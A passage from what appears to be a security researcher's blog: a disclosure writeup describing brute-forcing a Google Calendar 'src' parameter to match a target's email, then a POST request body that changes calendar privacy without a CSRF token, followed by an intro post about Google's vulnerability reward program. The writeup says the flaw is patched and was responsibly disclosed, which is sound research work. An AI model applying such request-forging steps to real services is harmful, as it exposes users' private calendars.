  4. Through trial and error, try different permutations of letters/numbers in the first few characters of the src parameter. You can see how your changes affect the decoded string by looking in the upper left of the image: it will display a new email address based on your changes (sometimes it might tell you that the src is invalid, in which case you just continue trying). There’s a small enough number of possibilities that it can be brute-forced.
  5. Eventually, you figure out what the right src value is for the target: the email on top will match the target’s email address.

From there, the rest was simple. Privacy settings were controlled by sending a POST request to https://www.google.com/calendar/editcaldetails. A CSRF token was included if the request was made via the web interface, but omitting the token did not prevent the request from functioning. The POST body consisted of just the following:

dtid=[VALID-SRC]
&ap=X19wdWJsaWNfcHJpbmNpcGFsX19dcHVibGljxmNhbGVuZGFyLmdvb2dsZS5jb20
&ap=20

where [VALID-SRC] was the valid src found in step 5 and the rest was a constant derived from the HTML for the corresponding form in the web interface.

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team.

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
11.30

When a friend of mine told me about Google’s new vulnerability reward program for web applications, my first reaction was a mix of excitement and skepticism. On the one hand, I love web application security and penetration testing: this program was right up my alley (especially given my recent abundance of free time). On the other hand, I had never run across a security vulnerability in a Google application before: I wasn’t sure that I would find anything, even if I looked hard.

As it turned out, I needn’t have worried: I spent many hours testing various Google webapps, but I also found plenty of vulnerabilities. ;-)

Under the terms of the program (and the rules of responsible disclosure), I will not be discussing the details of any vulnerabilities until they are fully resolved. Once the Google Security Team has confirmed to me that a particular issue has been dealt with, I will be doing a little writeup about it on this blog (a full list of the writeups can be found here). Hopefully people will find the writeups informative. :-)